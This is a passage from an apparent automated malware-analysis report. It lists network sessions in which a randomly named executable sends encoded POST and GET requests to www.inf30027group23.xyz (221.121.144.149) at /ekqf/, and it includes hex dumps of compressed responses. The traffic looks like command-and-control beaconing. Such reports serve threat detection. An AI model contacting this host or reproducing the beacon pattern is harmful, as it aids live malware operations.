                                              Data Ascii: U#g)<Zg:AQpxRB:`UgYC)%/2ySt16*?KD.a!5&!2JI0HC{:fZ)\e9.]LU,Z?j 9^Gn<\B9i#~]vi;]mNlZhH0<LU7_4%_tbi-tvm0I;|yro
                                              Sep 24, 2024 11:28:10.588834047 CEST1289INData Raw: af 2a 7f e4 88 ae 46 94 1c c9 d7 56 73 0e 95 80 f3 41 c8 94 2f 19 e1 69 10 4d d8 d1 73 72 e0 5d 85 ec 49 7c f9 0f ec aa 3f bb 1d e7 5e c9 0b c9 76 24 22 71 c9 78 78 50 97 aa 71 8d 3c 71 fa f2 11 20 d2 dd e3 89 ca 50 4c 4f a7 d1 34 ed 80 b8 78 aa
                                              Data Ascii: *FVsA/iMsr]I|?^v$"qxxPq<q PLO4x@f[$;V Tuxj5e0sx4.v!da'^47UU'U!y!;LuKwqZRE~xO0V`3~rIpkJ[Qf6CD
                                              Sep 24, 2024 11:28:10.900533915 CEST1289INData Raw: fd 71 a1 e7 8f 07 4f c1 6c 99 18 11 b1 65 72 44 e4 96 65 23 92 6d 59 3e 22 f9 96 15 23 52 6c 59 39 22 e5 96 ad 47 64 bd 65 9b 4d 6e de e6 ce ab 46 a3 8d 55 77 25 1a 5d fd 44 af 31 5d ac c3 96 22 2b 1a ec 88 7d 06 3f d2 92 88 7c 4d a4 5c 13 91 02
                                              Data Ascii: qOlerDe#mY>"#RlY9"GdeMnFUw%]D1]"+}?|M\G|wZ A,QK!%yH!"}=4c{r/j)I <+RKYDA"GA%%Z2&QnDlow34:zU#/s"H


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              26192.168.11.3049919221.121.144.149804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:28:12.396378994 CEST802OUTPOST /ekqf/ HTTP/1.1
                                              Host: www.inf30027group23.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.inf30027group23.xyz
                                              Referer: http://www.inf30027group23.xyz/ekqf/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 79 6d 5a 52 4e 49 63 6d 59 55 39 6f 50 53 6d 51 63 53 53 59 75 34 56 35 39 61 6e 39 6f 49 38 50 79 43 42 56 6d 63 53 33 4d 7a 2b 5a 62 79 70 4a 62 71 4b 30 6d 79 5a 74 79 58 33 62 65 76 4c 6d 53 6b 45 79 57 6d 4a 2f 32 43 6d 50 76 6b 63 79 39 42 72 79 4c 33 55 2f 72 61 47 49 57 4c 47 67 42 75 30 61 50 33 4f 4e 65 61 34 6b 64 74 7a 78 52 56 43 65 47 63 67 7a 6a 57 4a 7a 39 65 59 39 4d 52 45 4e 32 66 2f 55 6f 34 4b 56 66 75 63 6b 2f 77 77 53 65 61 37 49 74 36 4b 65 38 34 53 74 45 72 36 47 4e 5a 32 48 69 72 56 6e 78 49 68 51 51 4d 58 33 52 4d 2f 6c 69 59 2f 59 6b 32 6b 39 5a 72 77 76 63 34 2f 46 36 4d 73 5a 68 75 75 56 4e 71 4b 59 2b 43 73 3d
                                              Data Ascii: 7LY=ymZRNIcmYU9oPSmQcSSYu4V59an9oI8PyCBVmcS3Mz+ZbypJbqK0myZtyX3bevLmSkEyWmJ/2CmPvkcy9BryL3U/raGIWLGgBu0aP3ONea4kdtzxRVCeGcgzjWJz9eY9MREN2f/Uo4KVfuck/wwSea7It6Ke84StEr6GNZ2HirVnxIhQQMX3RM/liY/Yk2k9Zrwvc4/F6MsZhuuVNqKY+Cs=
                                              Sep 24, 2024 11:28:13.349762917 CEST1289INHTTP/1.1 404 Not Found
                                              Connection: close
                                              x-litespeed-tag: 3da_HTTP.404
                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              content-type: text/html; charset=UTF-8
                                              link: <https://inf30027group23.xyz/wp-json/>; rel="https://api.w.org/"
                                              x-litespeed-cache-control: no-cache
                                              cache-control: no-cache, no-store, must-revalidate, max-age=0
                                              transfer-encoding: chunked
                                              content-encoding: br
                                              vary: Accept-Encoding
                                              date: Tue, 24 Sep 2024 09:28:13 GMT
                                              server: LiteSpeed
                                              Data Raw: 35 38 35 38 0d 0a f4 ff 1f 22 2a 7b 3f 9c 19 29 5a 3d 04 34 52 16 ce df 3f 03 c7 f5 58 e7 fd e7 9b 69 7d b7 ab e6 e3 ff 99 2a 77 8b 36 00 01 e0 21 89 1a 29 71 12 7b ae c3 93 99 dd 75 f7 aa 20 f2 91 82 1b 04 18 00 d4 11 0e ff 7c 53 ed 5b 9a f1 c7 ff 5b 64 1c c7 5b 02 c4 49 80 8e c4 1e 6e ba 97 bd 71 8f db 3b 5c 88 84 44 da 10 c1 02 90 64 25 e3 bf f7 7d b5 ca 65 c7 b9 68 e2 49 67 d6 f8 8c 16 5c e3 7c 64 7c 74 cc 0d de 37 55 fb 01 30 00 08 06 00 c8 00 34 01 41 30 70 3a e7 5c f7 fe fb 86 00 8d 16 04 29 89 14 a9 6e aa 2d 7d b3 8d a5 44 8d 71 2e db 20 b4 94 da 39 75 af 71 e1 44 9b 64 0f c4 18 a8 d7 d9 b0 c3 ad 8d b4 e1 e6 d9 6c 63 56 e3 f5 2f 75 25 84 10 52 68 ab e8 32 ac e9 b9 5f b7 bf a5 01 42 08 90 8f ea 1e 43 ad fb b1 da df d7 28 e0 26 46 19 ed 63 a8 75 bd fb 35 9b c4 81 8a 68 1c 88 34 a4 12 a0 ae af 60 67 ec cd f2 55 6f bf 4f d0 d2 9f bf 24 07 4e 2e ef 31 5e 26 ff fe 80 71 9f 1c fb dd 85 2d b0 aa c7 7d 22 2c a5 84 1c 3e 8a 7a d7 3e e9 45 04 0e f4 fe 6f 1c 0d b5 32 b8 17 c9 e1 37 6f 1e e0 b7 46 db 57 [TRUNCATED]
                                              Data Ascii: 5858"*{?)Z=4R?Xi}*w6!)q{u |S[[d[Inq;\Dd%}ehIg\|d|t7U04A0p:\)n-}Dq. 9uqDdlcV/u%Rh2_BC(&Fcu5h4`gUoO$N.1^&q-}",>z>Eo27oFWh]W|CZu1+!4<cu?No`ux_#{+6p|w_B/;.2cP S!<:CX-Pzx#~Q~0;[sYjq2w_XEl{PaHak\}}"W>c|T`G0$C)>L?x#&$^7qmq.=Ffvux~MIH2zg"!IvU6gHv68cPBSOrW(~ed&j~S"Ra$w"disNQ]O'}#$TaIX(OBmXRYE3SWb_|>zN[6"juz82_|Z
                                              Sep 24, 2024 11:28:13.349786043 CEST1289INData Raw: 96 65 b6 15 b2 d8 64 e2 72 2c c7 48 a2 ea eb f1 e7 24 c0 1a 2f 4c 2a b9 e5 24 39 51 e8 ed 93 4a 6e b6 24 a9 95 d4 03 e3 27 66 92 e4 38 85 a0 7b 59 35 6f 9e 5f e6 df ae 54 aa 79 30 bb d5 2b c3 5a 30 43 b9 e8 cd 1b 07 70 d9 53 63 03 bd 0b 06 33 b1
                                              Data Ascii: edr,H$/L*$9QJn$'f8{Y5o_Ty0+Z0CpSc3>?yOu69Tv{$fJ2m8Le~t}62.RR3wom`SrR%9WY5y|^!^=D8Wky[UB/@'It?c&\O8
                                              Sep 24, 2024 11:28:13.349797964 CEST1289INData Raw: 67 b4 8a c1 7d 5d 57 8a a0 2d 60 aa 74 57 fb 1a 5f f6 f8 35 ea 61 89 bd f5 de 87 2c 7d 7c c4 d1 20 2a 7d fd 6f f7 fb f8 f8 b8 8c 25 14 78 90 3d 8c 85 ff e4 e9 8e 0a 11 27 12 67 f9 2d d4 cb d3 1a d5 11 cb 7e fa db 5f fe 89 aa b9 ef df 0a 62 d9 dd
                                              Data Ascii: g}]W-`tW_5a,}| *}o%x='g-~_b!y+?*cN~w|b>VG|`'2LeJZ}wSV^]\Bn8Y>oSGi:\:>PHGSnmpw@7'Wt2:Z@\{w|BVu^[jlV
                                              Sep 24, 2024 11:28:13.349888086 CEST1289INData Raw: 87 53 a9 f8 67 c1 0c 26 05 15 60 7d 1d a6 3d 1a 4d 33 b5 fd 19 05 36 a0 38 8a 9f 1a 20 91 a7 ef 4d 53 55 c7 86 08 e3 fd 3c 70 be 27 d8 66 34 9a 46 66 ca d3 0d 7e f8 16 74 d4 ce 56 ca 18 e0 4c 06 e1 73 c9 fa 32 47 d1 17 ba 31 1a 6d d1 9a 63 f3 07
                                              Data Ascii: Sg&`}=M368 MSU<p'f4Ff~tVLs2G1mcO$#4Y`jgT]qSk7{wLrYuZ^,M(Du9^`>M#uc0Pox]g!k]^/;sInkvh:,tc
                                              Sep 24, 2024 11:28:13.350087881 CEST1289INData Raw: 8e c1 a0 f4 03 72 b1 3f a8 c1 f0 1a 5d 93 45 ca 35 4e 5f 5a 0c 13 bb 45 c7 6c c0 dc 26 2e bc a9 0a 38 f5 8e 02 57 68 f7 b8 95 82 6d 87 5b 3a 2d 36 ea 15 ad 98 e6 84 f8 54 16 c9 c7 f8 d4 0c 0b f8 2e ba b0 b0 39 b1 30 30 65 74 67 57 9b da 9a 16 f9
                                              Data Ascii: r?]E5N_ZEl&.8Whm[:-6T.900etgWnkU4MWU=gA4w+f0J/~(V{=f^|$+>Ha9,!&8wky>pIl?3!1;Z@9&U<HyLV6*+h:-Mn|!T
                                              Sep 24, 2024 11:28:13.350102901 CEST1289INData Raw: 41 30 87 7c f2 73 9e 17 b4 d7 f7 6b df 36 ef 6a f1 35 d8 94 e8 2e a2 80 c0 dc 75 28 b3 54 c1 12 6f 24 b9 34 44 0e 16 2e e4 8a 98 d8 d7 51 e7 40 4b ce c2 59 a6 8e 76 e8 27 78 45 6d 3b 38 8b f3 74 82 86 48 63 52 0d 4d 27 d3 9b b0 46 42 6e 4d b6 1e
                                              Data Ascii: A0|sk6j5.u(To$4D.Q@KYv'xEm;8tHcRM'FBnMFiDJ$ ])/DJ8wUFtigZm09{*UpF7BbB>Uat@p2~D*p4,FqRD*A#!X;$<?# W sib+j*BL[cJ#1
                                              Sep 24, 2024 11:28:13.350214005 CEST1289INData Raw: c0 09 32 99 2d a6 a0 32 50 6a 11 73 4e 4b 15 da 30 ef 2e c0 4a 1e 6b e8 de 5f 68 63 15 5c 06 96 f3 2f e5 d5 ab a1 82 ab 57 c3 2e 9a 5d 01 9b c1 76 d1 ff 2c 09 65 ab 7a d8 30 1a f3 cb e8 a2 13 10 04 83 6e 02 e3 f5 25 6b 9f b6 cb dc 5e 55 6f f6 7a
                                              Data Ascii: 2-2PjsNK0.Jk_hc\/W.]v,ez0n%k^Uoz{EA{4VpFen+.K`v(1D3&GAj^]L5K\D6,NNS'`qf7L4s_=tFJvL^V}o3aq
                                              Sep 24, 2024 11:28:13.350334883 CEST1289INData Raw: 7f d6 77 25 e8 6e 92 a7 41 10 5b d1 49 68 1a 17 c0 77 2f 4b e1 00 d5 7f 12 d5 60 4b ae 32 84 b4 bb d5 bc 2c 7a e0 02 65 68 48 2b 12 2b c2 e4 c4 94 0f f9 00 1b 3e dc 88 d3 2b 25 c5 26 0a f8 e5 67 cf 55 4a 9c eb 83 db 65 f6 db 4b f6 62 75 e5 93 d1
                                              Data Ascii: w%nA[Ihw/K`K2,zehH++>+%&gUJeKbur3L8#V!Z</@}curEyZ}2jeHJK2rW9$%Hg\)J%BH?(Ys$r&>Df6l!=YKrAFG+*pkj^7-xHqY
                                              Sep 24, 2024 11:28:13.350358963 CEST1289INData Raw: 89 98 09 55 23 9a 67 29 0d 3c 5a 67 3a d7 09 41 51 0a e6 18 f3 70 bb 78 52 42 8b 9c a4 9d 3a 60 55 ed 67 05 ef ae f6 df 59 b4 e8 a6 43 fd 95 c5 29 99 25 f8 0e a0 92 e2 2f a3 32 79 87 53 74 bc 31 9c f7 a7 36 2a 0b 3f de e1 4b 90 44 b4 1e a6 2e d7
                                              Data Ascii: U#g)<Zg:AQpxRB:`UgYC)%/2ySt16*?KD.a!5&!2JI0HC{:fZ)\e9.]LU,Z?j 9^Gn<\B9i#~]vi;]mNlZhH0<LU7_4%_tbi-tvm0I;|yro
                                              Sep 24, 2024 11:28:13.350372076 CEST1289INData Raw: af 2a 7f e4 88 ae 46 94 1c c9 d7 56 73 0e 95 80 f3 41 c8 94 2f 19 e1 69 10 4d d8 d1 73 72 e0 5d 85 ec 49 7c f9 0f ec aa 3f bb 1d e7 5e c9 0b c9 76 24 22 71 c9 78 78 50 97 aa 71 8d 3c 71 fa f2 11 20 d2 dd e3 89 ca 50 4c 4f a7 d1 34 ed 80 b8 78 aa
                                              Data Ascii: *FVsA/iMsr]I|?^v$"qxxPq<q PLO4x@f[$;V Tuxj5e0sx4.v!da'^47UU'U!y!;LuKwqZRE~xO0V`3~rIpkJ[Qf6CD
                                              Sep 24, 2024 11:28:13.662117004 CEST1289INData Raw: fd 71 a1 e7 8f 07 4f c1 6c 99 18 11 b1 65 72 44 e4 96 65 23 92 6d 59 3e 22 f9 96 15 23 52 6c 59 39 22 e5 96 ad 47 64 bd 65 9b 4d 6e de e6 ce ab 46 a3 8d 55 77 25 1a 5d fd 44 af 31 5d ac c3 96 22 2b 1a ec 88 7d 06 3f d2 92 88 7c 4d a4 5c 13 91 02
                                              Data Ascii: qOlerDe#mY>"#RlY9"GdeMnFUw%]D1]"+}?|M\G|wZ A,QK!%yH!"}=4c{r/j)I <+RKYDA"GA%%Z2&QnDlow34:zU#/s"H


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              27192.168.11.3049920221.121.144.149804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:28:15.238831997 CEST1289OUTPOST /ekqf/ HTTP/1.1
                                              Host: www.inf30027group23.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.inf30027group23.xyz
                                              Referer: http://www.inf30027group23.xyz/ekqf/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 79 6d 5a 52 4e 49 63 6d 59 55 39 6f 50 53 6d 51 63 53 53 59 75 34 56 35 39 61 6e 39 6f 49 38 50 79 43 42 56 6d 63 53 33 4d 79 47 5a 62 67 68 4a 61 4a 69 30 70 53 5a 74 34 33 33 61 65 76 4c 42 53 6b 63 75 57 6d 55 64 32 47 57 50 39 58 45 79 74 67 72 79 46 48 55 2f 70 61 47 4e 62 72 48 69 42 75 6b 65 50 32 79 4e 65 61 34 6b 64 72 66 78 46 77 75 65 45 63 67 79 71 32 4a 33 33 2b 59 46 4d 58 74 32 32 66 37 45 6f 2b 65 56 65 64 6b 6b 2f 45 51 53 65 61 37 49 6a 61 4b 66 38 34 4f 6f 45 74 53 73 4e 59 4f 39 6c 59 5a 6e 31 5a 42 4e 4b 39 6e 4c 54 76 50 76 68 35 53 76 6d 33 4d 65 5a 49 67 33 59 37 62 6b 77 76 41 46 73 72 65 78 4a 59 2b 63 72 57 59 5a 41 74 71 6f 67 6a 4c 56 56 54 54 66 41 52 6e 45 4d 4a 32 37 4a 2b 2f 46 75 36 41 6e 62 61 63 31 6b 56 34 66 42 36 5a 74 66 74 4c 45 4d 4e 51 34 4e 44 38 4f 74 39 4a 31 69 31 66 4f 6a 59 43 2f 6b 69 34 52 59 31 47 4a 74 4f 4e 34 34 58 63 56 6e 44 78 35 49 33 50 73 4b 70 48 44 2b 66 36 55 45 45 51 67 4d 6f 6e 4b 4a 65 57 55 31 2f 4f 44 79 7a 66 71 6c 46 [TRUNCATED]
                                              Data Ascii: 7LY=ymZRNIcmYU9oPSmQcSSYu4V59an9oI8PyCBVmcS3MyGZbghJaJi0pSZt433aevLBSkcuWmUd2GWP9XEytgryFHU/paGNbrHiBukeP2yNea4kdrfxFwueEcgyq2J33+YFMXt22f7Eo+eVedkk/EQSea7IjaKf84OoEtSsNYO9lYZn1ZBNK9nLTvPvh5Svm3MeZIg3Y7bkwvAFsrexJY+crWYZAtqogjLVVTTfARnEMJ27J+/Fu6Anbac1kV4fB6ZtftLEMNQ4ND8Ot9J1i1fOjYC/ki4RY1GJtON44XcVnDx5I3PsKpHD+f6UEEQgMonKJeWU1/ODyzfqlF5YDrqZU0ywTaYlI8c8IK5qrUvY4Av/+ZKphsUyJQ7idkF3Cbf3pHXxwi1NEGX/GXRmUgpVMiVwLfcQNFkgTJs96sSczWRy51p1G46VcLg+UZRlWD5cQ9fsraeUxb/Ak74xbCctVZNR1YjuBPlZafakj5+lUROtMPPjVlJIxZkjgEg5j/XXxxWQz4MrpNUUeGje3VB5t5gxBaMkdMCbrPyrXEdqYHl4wXV+taIDW8cz7hIHbNSVceBhElg62VZ4OdoVpYVKTQ4iKYLKJQPJwuYzCl6S7CzcEjhDIlHgQZtrWLIyHfkNIfBT9cxKXLyGqXZc2s5+ib++cfWljdVhCVx2UaBwhosn5tRlFFXRlOFzpFRlWq
                                              Sep 24, 2024 11:28:15.238890886 CEST2630OUTData Raw: 45 42 77 54 56 79 4a 36 51 77 54 30 4a 36 4f 7a 33 6d 76 77 47 2f 46 48 50 75 68 30 71 76 49 39 74 55 43 46 51 75 64 54 42 4e 62 4a 41 73 69 68 72 43 39 64 55 30 48 66 6b 68 55 39 79 51 6a 63 74 63 75 58 38 49 36 53 6e 78 6a 4e 38 46 76 77 6d 65
                                              Data Ascii: EBwTVyJ6QwT0J6Oz3mvwG/FHPuh0qvI9tUCFQudTBNbJAsihrC9dU0HfkhU9yQjctcuX8I6SnxjN8Fvwmed3WEGKtDN+A4IBMjpMJpDgdQo15YCx7jiITON5c9jx3Pj63Ebv/dTfz/ePR+wYJUTN40ApxwspnxlDq+PZBVMYYQnS0rD+Va86vEV5jo7TPL4JuS0Li1Oj9un5k8CEQfNGDwhjrudSzeXGut5J9O3x1D8NaA2ZVJw
                                              Sep 24, 2024 11:28:16.174061060 CEST1289INHTTP/1.1 404 Not Found
                                              Connection: close
                                              x-litespeed-tag: 3da_HTTP.404
                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              content-type: text/html; charset=UTF-8
                                              link: <https://inf30027group23.xyz/wp-json/>; rel="https://api.w.org/"
                                              x-litespeed-cache-control: no-cache
                                              cache-control: no-cache, no-store, must-revalidate, max-age=0
                                              transfer-encoding: chunked
                                              content-encoding: br
                                              vary: Accept-Encoding
                                              date: Tue, 24 Sep 2024 09:28:16 GMT
                                              server: LiteSpeed
                                              Data Raw: 35 38 35 38 0d 0a f4 ff 1f 22 2a 7b 3f 9c 19 29 5a 3d 04 34 52 16 ce df 3f 03 c7 f5 58 e7 fd e7 9b 69 7d b7 ab e6 e3 ff 99 2a 77 8b 36 00 01 e0 21 89 1a 29 71 12 7b ae c3 93 99 dd 75 f7 aa 20 f2 91 82 1b 04 18 00 d4 11 0e ff 7c 53 ed 5b 9a f1 c7 ff 5b 64 1c c7 5b 02 c4 49 80 8e c4 1e 6e ba 97 bd 71 8f db 3b 5c 88 84 44 da 10 c1 02 90 64 25 e3 bf f7 7d b5 ca 65 c7 b9 68 e2 49 67 d6 f8 8c 16 5c e3 7c 64 7c 74 cc 0d de 37 55 fb 01 30 00 08 06 00 c8 00 34 01 41 30 70 3a e7 5c f7 fe fb 86 00 8d 16 04 29 89 14 a9 6e aa 2d 7d b3 8d a5 44 8d 71 2e db 20 b4 94 da 39 75 af 71 e1 44 9b 64 0f c4 18 a8 d7 d9 b0 c3 ad 8d b4 e1 e6 d9 6c 63 56 e3 f5 2f 75 25 84 10 52 68 ab e8 32 ac e9 b9 5f b7 bf a5 01 42 08 90 8f ea 1e 43 ad fb b1 da df d7 28 e0 26 46 19 ed 63 a8 75 bd fb 35 9b c4 81 8a 68 1c 88 34 a4 12 a0 ae af 60 67 ec cd f2 55 6f bf 4f d0 d2 9f bf 24 07 4e 2e ef 31 5e 26 ff fe 80 71 9f 1c fb dd 85 2d b0 aa c7 7d 22 2c a5 84 1c 3e 8a 7a d7 3e e9 45 04 0e f4 fe 6f 1c 0d b5 32 b8 17 c9 e1 37 6f 1e e0 b7 46 db 57 [TRUNCATED]
                                              Data Ascii: 5858"*{?)Z=4R?Xi}*w6!)q{u |S[[d[Inq;\Dd%}ehIg\|d|t7U04A0p:\)n-}Dq. 9uqDdlcV/u%Rh2_BC(&Fcu5h4`gUoO$N.1^&q-}",>z>Eo27oFWh]W|CZu1+!4<cu?No`ux_#{+6p|w_B/;.2cP S!<:CX-Pzx#~Q~0;[sYjq2w_XEl{PaHak\}}"W>c|T`G0$C)>L?x#&$^7qmq.=Ffvux~MIH2zg"!IvU6gHv68cPBSOrW(~ed&j~S"Ra$w"disNQ]O'}#$TaIX(OBmXRYE3SWb_|>zN[6"juz82_|Z
                                              Sep 24, 2024 11:28:16.174153090 CEST1289INData Raw: 96 65 b6 15 b2 d8 64 e2 72 2c c7 48 a2 ea eb f1 e7 24 c0 1a 2f 4c 2a b9 e5 24 39 51 e8 ed 93 4a 6e b6 24 a9 95 d4 03 e3 27 66 92 e4 38 85 a0 7b 59 35 6f 9e 5f e6 df ae 54 aa 79 30 bb d5 2b c3 5a 30 43 b9 e8 cd 1b 07 70 d9 53 63 03 bd 0b 06 33 b1
                                              Data Ascii: edr,H$/L*$9QJn$'f8{Y5o_Ty0+Z0CpSc3>?yOu69Tv{$fJ2m8Le~t}62.RR3wom`SrR%9WY5y|^!^=D8Wky[UB/@'It?c&\O8
                                              Sep 24, 2024 11:28:16.174166918 CEST1289INData Raw: 67 b4 8a c1 7d 5d 57 8a a0 2d 60 aa 74 57 fb 1a 5f f6 f8 35 ea 61 89 bd f5 de 87 2c 7d 7c c4 d1 20 2a 7d fd 6f f7 fb f8 f8 b8 8c 25 14 78 90 3d 8c 85 ff e4 e9 8e 0a 11 27 12 67 f9 2d d4 cb d3 1a d5 11 cb 7e fa db 5f fe 89 aa b9 ef df 0a 62 d9 dd
                                              Data Ascii: g}]W-`tW_5a,}| *}o%x='g-~_b!y+?*cN~w|b>VG|`'2LeJZ}wSV^]\Bn8Y>oSGi:\:>PHGSnmpw@7'Wt2:Z@\{w|BVu^[jlV
                                              Sep 24, 2024 11:28:16.174268961 CEST1289INData Raw: 87 53 a9 f8 67 c1 0c 26 05 15 60 7d 1d a6 3d 1a 4d 33 b5 fd 19 05 36 a0 38 8a 9f 1a 20 91 a7 ef 4d 53 55 c7 86 08 e3 fd 3c 70 be 27 d8 66 34 9a 46 66 ca d3 0d 7e f8 16 74 d4 ce 56 ca 18 e0 4c 06 e1 73 c9 fa 32 47 d1 17 ba 31 1a 6d d1 9a 63 f3 07
                                              Data Ascii: Sg&`}=M368 MSU<p'f4Ff~tVLs2G1mcO$#4Y`jgT]qSk7{wLrYuZ^,M(Du9^`>M#uc0Pox]g!k]^/;sInkvh:,tc
                                              Sep 24, 2024 11:28:16.174421072 CEST1289INData Raw: 8e c1 a0 f4 03 72 b1 3f a8 c1 f0 1a 5d 93 45 ca 35 4e 5f 5a 0c 13 bb 45 c7 6c c0 dc 26 2e bc a9 0a 38 f5 8e 02 57 68 f7 b8 95 82 6d 87 5b 3a 2d 36 ea 15 ad 98 e6 84 f8 54 16 c9 c7 f8 d4 0c 0b f8 2e ba b0 b0 39 b1 30 30 65 74 67 57 9b da 9a 16 f9
                                              Data Ascii: r?]E5N_ZEl&.8Whm[:-6T.900etgWnkU4MWU=gA4w+f0J/~(V{=f^|$+>Ha9,!&8wky>pIl?3!1;Z@9&U<HyLV6*+h:-Mn|!T
                                              Sep 24, 2024 11:28:16.174436092 CEST1289INData Raw: 41 30 87 7c f2 73 9e 17 b4 d7 f7 6b df 36 ef 6a f1 35 d8 94 e8 2e a2 80 c0 dc 75 28 b3 54 c1 12 6f 24 b9 34 44 0e 16 2e e4 8a 98 d8 d7 51 e7 40 4b ce c2 59 a6 8e 76 e8 27 78 45 6d 3b 38 8b f3 74 82 86 48 63 52 0d 4d 27 d3 9b b0 46 42 6e 4d b6 1e
                                              Data Ascii: A0|sk6j5.u(To$4D.Q@KYv'xEm;8tHcRM'FBnMFiDJ$ ])/DJ8wUFtigZm09{*UpF7BbB>Uat@p2~D*p4,FqRD*A#!X;$<?# W sib+j*BL[cJ#1
                                              Sep 24, 2024 11:28:16.174478054 CEST1289INData Raw: c0 09 32 99 2d a6 a0 32 50 6a 11 73 4e 4b 15 da 30 ef 2e c0 4a 1e 6b e8 de 5f 68 63 15 5c 06 96 f3 2f e5 d5 ab a1 82 ab 57 c3 2e 9a 5d 01 9b c1 76 d1 ff 2c 09 65 ab 7a d8 30 1a f3 cb e8 a2 13 10 04 83 6e 02 e3 f5 25 6b 9f b6 cb dc 5e 55 6f f6 7a
                                              Data Ascii: 2-2PjsNK0.Jk_hc\/W.]v,ez0n%k^Uoz{EA{4VpFen+.K`v(1D3&GAj^]L5K\D6,NNS'`qf7L4s_=tFJvL^V}o3aq
                                              Sep 24, 2024 11:28:16.174596071 CEST1289INData Raw: 7f d6 77 25 e8 6e 92 a7 41 10 5b d1 49 68 1a 17 c0 77 2f 4b e1 00 d5 7f 12 d5 60 4b ae 32 84 b4 bb d5 bc 2c 7a e0 02 65 68 48 2b 12 2b c2 e4 c4 94 0f f9 00 1b 3e dc 88 d3 2b 25 c5 26 0a f8 e5 67 cf 55 4a 9c eb 83 db 65 f6 db 4b f6 62 75 e5 93 d1
                                              Data Ascii: w%nA[Ihw/K`K2,zehH++>+%&gUJeKbur3L8#V!Z</@}curEyZ}2jeHJK2rW9$%Hg\)J%BH?(Ys$r&>Df6l!=YKrAFG+*pkj^7-xHqY
                                              Sep 24, 2024 11:28:16.174612045 CEST1289INData Raw: 89 98 09 55 23 9a 67 29 0d 3c 5a 67 3a d7 09 41 51 0a e6 18 f3 70 bb 78 52 42 8b 9c a4 9d 3a 60 55 ed 67 05 ef ae f6 df 59 b4 e8 a6 43 fd 95 c5 29 99 25 f8 0e a0 92 e2 2f a3 32 79 87 53 74 bc 31 9c f7 a7 36 2a 0b 3f de e1 4b 90 44 b4 1e a6 2e d7
                                              Data Ascii: U#g)<Zg:AQpxRB:`UgYC)%/2ySt16*?KD.a!5&!2JI0HC{:fZ)\e9.]LU,Z?j 9^Gn<\B9i#~]vi;]mNlZhH0<LU7_4%_tbi-tvm0I;|yro
                                              Sep 24, 2024 11:28:16.174624920 CEST1289INData Raw: af 2a 7f e4 88 ae 46 94 1c c9 d7 56 73 0e 95 80 f3 41 c8 94 2f 19 e1 69 10 4d d8 d1 73 72 e0 5d 85 ec 49 7c f9 0f ec aa 3f bb 1d e7 5e c9 0b c9 76 24 22 71 c9 78 78 50 97 aa 71 8d 3c 71 fa f2 11 20 d2 dd e3 89 ca 50 4c 4f a7 d1 34 ed 80 b8 78 aa
                                              Data Ascii: *FVsA/iMsr]I|?^v$"qxxPq<q PLO4x@f[$;V Tuxj5e0sx4.v!da'^47UU'U!y!;LuKwqZRE~xO0V`3~rIpkJ[Qf6CD


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              28192.168.11.3049921221.121.144.149804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:28:18.077303886 CEST499OUTGET /ekqf/?7LY=/kxxO9I2Zn9CFnKuVCiRmYl7loL48a9gy2ZogM6oKxXZExQsRNG6tTBrzETHf9DgSWw7bkgf2Hzd7TUNthqLIFQo8IeMSZ2DAN9PXR2KJtcXc92xKDXLKag=&Nze=C0klVT HTTP/1.1
                                              Host: www.inf30027group23.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:28:18.747298002 CEST613INHTTP/1.1 301 Moved Permanently
                                              Connection: close
                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              cache-control: no-cache, must-revalidate, max-age=0
                                              content-type: text/html; charset=UTF-8
                                              x-redirect-by: WordPress
                                              location: http://inf30027group23.xyz/ekqf/?7LY=/kxxO9I2Zn9CFnKuVCiRmYl7loL48a9gy2ZogM6oKxXZExQsRNG6tTBrzETHf9DgSWw7bkgf2Hzd7TUNthqLIFQo8IeMSZ2DAN9PXR2KJtcXc92xKDXLKag=&Nze=C0klVT
                                              x-litespeed-cache-control: public,max-age=3600
                                              x-litespeed-tag: 3da_HTTP.404,3da_HTTP.301,3da_404,3da_URL.eaddfd689b6edbf929721ed03ee3c9e9,3da_
                                              content-length: 0
